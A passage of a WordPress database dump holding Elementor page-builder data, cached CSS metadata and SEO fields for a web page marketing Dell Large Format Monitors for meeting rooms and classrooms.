presentation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7c7592f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"8349623\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_10.jpg\\\" alt=\\\"Solutions you can count on\\\" width=\\\"412\\\" height=\\\"325\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b154bbe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8c77514\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ab08df2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb13a0c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"69147c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.955},\"elements\":[{\"id\":\"ff020de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_11.jpg\\\" alt=\\\"Dependable reliability\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1222e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.045},\"elements\":[{\"id\":\"1b3c901\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Dependable reliability<\\/h2><\\/div><div><strong>Peace of mind comes standard:<\\/strong>\\u00a0Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a class=\\\"technote microcontent\\\" rel=\\\"technotes:advanced-exchange-service-monitors\\\">*<\\/a>\\u00a0so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a class=\\\"technote microcontent\\\" rel=\\\"technotes:hardware-warranty-monitors\\\">*<\\/a>\\u00a0up to 5-years for additional support.<br \\/><br \\/><strong>Low maintenance. Simple manageability:\\u00a0<\\/strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8710,3672,'_elementor_css','a:5:{s:4:\"time\";i:1571995365;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8711,3661,'_oembed_6f0992158550c37d5a0dc1b50d1db372','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/Z98yJnbXWq8?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(8712,3661,'_oembed_time_6f0992158550c37d5a0dc1b50d1db372','1572310911'),(8717,1448,'_elementor_css','a:5:{s:4:\"time\";i:1572021226;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8718,3007,'_elementor_css','a:5:{s:4:\"time\";i:1572021228;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8719,1555,'_elementor_css','a:5:{s:4:\"time\";i:1572021232;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8720,1486,'_elementor_css','a:5:{s:4:\"time\";i:1572021241;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8721,3606,'_elementor_css','a:5:{s:4:\"time\";i:1572024004;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8722,3074,'_elementor_css','a:5:{s:4:\"time\";i:1572024004;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8723,3056,'_elementor_css','a:5:{s:4:\"time\";i:1572024005;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8724,3009,'_elementor_css','a:5:{s:4:\"time\";i:1572024007;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8725,3008,'_elementor_css','a:5:{s:4:\"time\";i:1572024008;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8726,2999,'_elementor_css','a:5:{s:4:\"time\";i:1572029870;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8727,1529,'_elementor_css','a:5:{s:4:\"time\";i:1572030198;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8728,2928,'_elementor_css','a:5:{s:4:\"time\";i:1572034059;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8729,1530,'_elementor_css','a:5:{s:4:\"time\";i:1572037870;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8730,2000,'_elementor_css','a:5:{s:4:\"time\";i:1572063122;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8731,2834,'_elementor_css','a:6:{s:4:\"time\";i:1572083345;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(8732,2972,'_elementor_css','a:5:{s:4:\"time\";i:1572099474;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8733,2954,'_elementor_css','a:5:{s:4:\"time\";i:1572102882;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8734,2885,'_elementor_css','a:5:{s:4:\"time\";i:1572102920;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8735,2987,'_elementor_css','a:5:{s:4:\"time\";i:1572124421;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8736,2580,'_elementor_css','a:5:{s:4:\"time\";i:1572131253;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8740,1531,'_elementor_css','a:5:{s:4:\"time\";i:1572261976;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8741,1449,'_elementor_css','a:5:{s:4:\"time\";i:1572261980;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8742,1620,'_elementor_css','a:5:{s:4:\"time\";i:1572286812;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8757,3661,'_aioseop_title','Dell Large Format Displays'),(8756,3661,'_aioseop_description','Experience smarter, faster collaboration in meeting rooms or classrooms with Dell Large Format.'),(8747,3661,'_yoast_wpseo_focuskw','Dell Large Format Displays'),(8748,3661,'_yoast_wpseo_linkdex','56'),(8749,3673,'_elementor_edit_mode','builder'),(8750,3673,'_elementor_template_type','wp-page'),(8751,3673,'_elementor_version','2.7.4'),(8752,3673,'_wp_page_template','template-fullwidth.php'),(8753,3673,'_elementor_data','[{\"id\":\"1428c7d\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"10c0343\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.072},\"elements\":[{\"id\":\"c13c1a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_02.jpg\\\" alt=\\\"Transform your meeting space\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf7a1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.928,\"content_position\":\"center\"},\"elements\":[{\"id\":\"c18c5e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Transform your meeting space<\\/h2><\\/div><div>Dell, the world\\u2019s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach and\\u00a0wide variety of displays ranging from 55\\u201d to 86\\u201d, it\\u2019s easy to find and\\u00a0customize a solution\\u00a0that keeps your team engaged and lets your business thrive.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a29589\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d94f107\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0d139f5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02b0460\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"23442a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"4c2a77c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Maximize your team\\u2019s productivity<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2222c78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a87a431\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_03.jpg\\\" alt=\\\"Maximize your team\\u2019s productivity\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df1a833\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"229d78d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f465b01\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6dddbc3\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ad2406f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.64},\"elements\":[{\"id\":\"f0cdfa8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_04.jpg\\\" alt=\\\"Next-level teamwork\\\" width=\\\"347\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8bd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.36,\"content_position\":\"bottom\"},\"elements\":[{\"id\":\"de42688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Next-level teamwork<\\/h2><\\/div><div><strong>More ways to interact:<\\/strong>\\u00a0Group collaboration is more seamless and intuitive than ever with our interactive monitors<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br \\/><br \\/><\\/div><div><p><strong>Collaboration solutions:<\\/strong>\\u00a0Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>.<br \\/><br \\/><strong>Collaboration for all:<\\/strong>\\u00a0Dell Screen Drop feature<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0lets you lower the displayed image so that it\\u2019s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5029420\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b8e6817\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29544d8\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01f3af0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f845c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6933422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Captivate your audience<\\/h2><\\/div><div><ul><li><strong>Make the most of your meeting:<\\/strong>\\u00a0With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.<\\/li><\\/ul><ul><li><strong>Present crisply and clearly:<\\/strong>\\u00a0Monitor scaling technology allows you to capture your audience\\u2019s attention with exceptionally clear text and vivid visuals.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a70680\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"670e9e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_05.jpg\\\" alt=\\\"Captivate your audience\\\" width=\\\"360\\\" height=\\\"267\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4b5b73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0df3684\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb72a42\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67af6a3\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"1823f82\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2c8aa0a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dell Large Format Monitors\",\"align\":\"center\",\"title_color\":\"#353535\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73d6a89\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4bd9f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2816dd3\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=Z98yJnbXWq8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"autoplay\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"746f096\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0102d24\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"249ca4a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d291a0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"6228508\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7c029ba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Flexible IT solutions<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fca6377\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"32f148a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_06.jpg\\\" alt=\\\"Flexible IT solutions\\\" width=\\\"445\\\" height=\\\"351\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0d8bc3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"be5af88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"28958ec\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b7a77eb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5bc9eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e074cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_07.jpg\\\" alt=\\\"Adapts to business needs. Present and future.\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b39d618\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4f1e8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Adapts to business needs. Present and future.<\\/h2><\\/div><div><ul><li><strong>Solutions that work with you:<\\/strong>\\u00a0Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology you\\u2019re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can also\\u00a0be loaded with your preferred corporate image, so that it adheres to your security and service standards.<\\/li><\\/ul><ul><li><strong>Customized to your needs:<\\/strong>\\u00a0Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7383992\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4264633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"494b60f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9282776\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"91efb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"758e0fa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Easy to deploy. Simple to manage.<\\/h2><\\/div><div><ul><li><strong>A smooth deployment:<\\/strong>\\u00a0With a few painless steps, and a couple of extra hands, it\\u2019s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether that\\u2019s a mobile cart, stand or wall mount.<\\/li><li><strong>Manage your meeting spaces:<\\/strong>\\u00a0With RS232 and RJ45<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7ed52d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"35ef182\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_08.jpg\\\" alt=\\\"Easy to deploy. Simple to manage.\\\" width=\\\"355\\\" height=\\\"263\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3643da4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"eba13d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"99eb408\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_09.jpg\\\" alt=\\\"Ultimate management\\\" width=\\\"337\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84d2d5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"857f2f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Ultimate management<\\/h2><\\/div><div><ul><li><strong>Seamless integration for easy access:<\\/strong>\\u00a0Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0without the need for a separate power cord, simplifying access to WiFi, annotation\\u00a0and\\u00a0meeting room management applications.<\\/li><li><strong>Easy to upgrade:<\\/strong>\\u00a0Thanks to\\u00a0it\'s\\u00a0modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0986c04\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea07f49\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8d2e27\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"651dcf7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"e0e5fdb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"e3c5aec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Solutions you can count on<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7c7592f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"8349623\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_10.jpg\\\" alt=\\\"Solutions you can count on\\\" width=\\\"412\\\" height=\\\"325\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b154bbe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8c77514\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ab08df2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb13a0c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"69147c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.955},\"elements\":[{\"id\":\"ff020de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_11.jpg\\\" alt=\\\"Dependable reliability\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1222e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.045},\"elements\":[{\"id\":\"1b3c901\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Dependable reliability<\\/h2><\\/div><div><strong>Peace of mind comes standard:<\\/strong>\\u00a0Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a class=\\\"technote microcontent\\\" rel=\\\"technotes:advanced-exchange-service-monitors\\\">*<\\/a>\\u00a0so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a class=\\\"technote microcontent\\\" rel=\\\"technotes:hardware-warranty-monitors\\\">*<\\/a>\\u00a0up to 5-years for additional support.<br \\/><br \\/><strong>Low maintenance. Simple manageability:\\u00a0<\\/strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8754,3673,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:20;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:20;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:31;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:20;s:16:\"content_position\";i:10;s:5:\"align\";i:3;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:21;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:3:{s:13:\"content_width\";i:1;s:6:\"layout\";i:1;s:16:\"content_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:10;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:3;s:16:\"background_color\";i:3;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5